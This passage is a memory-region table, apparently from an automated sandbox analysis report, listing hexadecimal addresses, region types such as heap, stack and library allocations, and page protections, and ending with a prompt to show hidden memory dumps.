|
page read and write
|
||
2CFF000
|
unkown
|
page read and write
|
||
7AC8000
|
trusted library allocation
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
32DC000
|
heap
|
page read and write
|
||
6066000
|
trusted library allocation
|
page read and write
|
||
499F000
|
stack
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
335E000
|
heap
|
page read and write
|
||
2520B000
|
heap
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
499F000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
1A3FE7E000
|
stack
|
page read and write
|
||
1A3FCF9000
|
stack
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
7D2D000
|
stack
|
page read and write
|
||
8910000
|
heap
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
25291000
|
heap
|
page read and write
|
||
819000
|
heap
|
page read and write
|
||
9CF000
|
stack
|
page read and write
|
||
252CC000
|
heap
|
page read and write
|
||
283A000
|
heap
|
page read and write
|
||
4997000
|
heap
|
page read and write
|
||
7BC6000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
7D80000
|
trusted library allocation
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
4DB2000
|
trusted library allocation
|
page read and write
|
||
73AE000
|
stack
|
page read and write
|
||
4E78000
|
trusted library allocation
|
page read and write
|
||
2D23000
|
heap
|
page read and write
|
||
933B000
|
heap
|
page read and write
|
||
8B4E000
|
stack
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
7560000
|
direct allocation
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
1DB000
|
stack
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
7D8000
|
heap
|
page read and write
|
||
8F20000
|
direct allocation
|
page read and write
|
||
833000
|
heap
|
page read and write
|
||
74FB000
|
stack
|
page read and write
|
||
2790000
|
heap
|
page read and write
|
||
2730000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
7E2B000
|
stack
|
page read and write
|
||
5481000
|
trusted library allocation
|
page read and write
|
||
2BEC000
|
heap
|
page read and write
|
||
6EFC000
|
stack
|
page read and write
|
||
7B57000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
4E90000
|
heap
|
page execute and read and write
|
||
9358000
|
heap
|
page read and write
|
||
7DF4E7490000
|
trusted library allocation
|
page execute and read and write
|
||
49FB000
|
heap
|
page read and write
|
||
4E81000
|
heap
|
page read and write
|
||
12080BAF000
|
trusted library allocation
|
page read and write
|
||
9358000
|
heap
|
page read and write
|
||
120F04AC000
|
heap
|
page read and write
|
||
7D60000
|
trusted library allocation
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
7570000
|
direct allocation
|
page read and write
|
||
49B7000
|
heap
|
page read and write
|
||
ACF000
|
stack
|
page read and write
|
||
9359000
|
heap
|
page read and write
|
||
2830000
|
heap
|
page read and write
|
||
2AEC000
|
stack
|
page read and write
|
||
8F00000
|
direct allocation
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
1A3FF7E000
|
stack
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
8BA0000
|
trusted library allocation
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
2B2C000
|
heap
|
page read and write
|
||
25C35000
|
heap
|
page read and write
|
||
2BEC000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
2B7B000
|
heap
|
page read and write
|
||
546B000
|
trusted library allocation
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
2543F000
|
heap
|
page read and write
|
||
838000
|
heap
|
page read and write
|
||
823000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
2B0B000
|
stack
|
page read and write
|
||
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
935D000
|
heap
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
9357000
|
heap
|
page read and write
|
||
5803000
|
trusted library allocation
|
page read and write
|
||
120F04CF000
|
heap
|
page read and write
|
||
81D000
|
heap
|
page read and write
|
||
8E90000
|
trusted library allocation
|
page execute and read and write
|
||
12080001000
|
trusted library allocation
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
4A10000
|
heap
|
page read and write
|
||
4D48000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
2543B000
|
heap
|
page read and write
|
||
9830000
|
direct allocation
|
page execute and read and write
|
||
400000
|
system
|
page execute and read and write
|
||
120EE120000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
583B000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
4A17000
|
heap
|
page read and write
|
||
120EE3A0000
|
heap
|
page read and write
|
||
2D2D000
|
heap
|
page read and write
|
||
5741000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
26B78000
|
heap
|
page read and write
|
||
2F80000
|
trusted library allocation
|
page read and write
|
||
4A17000
|
heap
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
12081E9E000
|
trusted library allocation
|
page read and write
|
||
9355000
|
heap
|
page read and write
|
||
1A40A4D000
|
stack
|
page read and write
|
||
58C6000
|
trusted library allocation
|
page read and write
|
||
4D50000
|
trusted library section
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
2B94000
|
heap
|
page read and write
|
||
2540B000
|
heap
|
page read and write
|
||
888D000
|
stack
|
page read and write
|
||
337B000
|
heap
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
CB45000
|
direct allocation
|
page execute and read and write
|
||
87D0000
|
trusted library allocation
|
page read and write
|
||
4D8D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
32D0000
|
heap
|
page read and write
|
||
12080482000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
8DCE000
|
stack
|
page read and write
|
||
120EE233000
|
heap
|
page read and write
|
||
120F05BF000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
45DF000
|
stack
|
page read and write
|
||
26645000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
1A3FBF9000
|
stack
|
page read and write
|
||
4D83000
|
trusted library allocation
|
page execute and read and write
|
||
120EE299000
|
heap
|
page read and write
|
||
4DB5000
|
heap
|
page read and write
|
||
26649000
|
heap
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
49A8000
|
heap
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
4D60000
|
trusted library section
|
page read and write
|
||
25291000
|
heap
|
page read and write
|
||
49B3000
|
heap
|
page read and write
|
||
78DE000
|
stack
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
120EE160000
|
heap
|
page read and write
|
||
4E8D000
|
heap
|
page read and write
|
||
25383000
|
heap
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
120F0526000
|
heap
|
page read and write
|
||
8C25000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
4997000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
4A1D000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
15D000
|
stack
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
831000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
8F30000
|
direct allocation
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
50C8000
|
heap
|
page read and write
|
||
732F000
|
stack
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
120F027C000
|
heap
|
page read and write
|
||
934D000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
1A3F5FE000
|
stack
|
page read and write
|
||
120F0261000
|
heap
|
page read and write
|
||
8EF0000
|
trusted library allocation
|
page read and write
|
||
569A000
|
trusted library allocation
|
page read and write
|
||
2BBF000
|
unkown
|
page read and write
|
||
1A3FD77000
|
stack
|
page read and write
|
||
26130000
|
heap
|
page read and write
|
||
7FFD9B967000
|
trusted library allocation
|
page read and write
|
||
4D99000
|
trusted library allocation
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
2950000
|
heap
|
page readonly
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
2543F000
|
heap
|
page read and write
|
||
49B1000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
88D0000
|
trusted library allocation
|
page read and write
|
||
87E0000
|
trusted library allocation
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
4910000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
There are 856 hidden memdumps, click here to show them.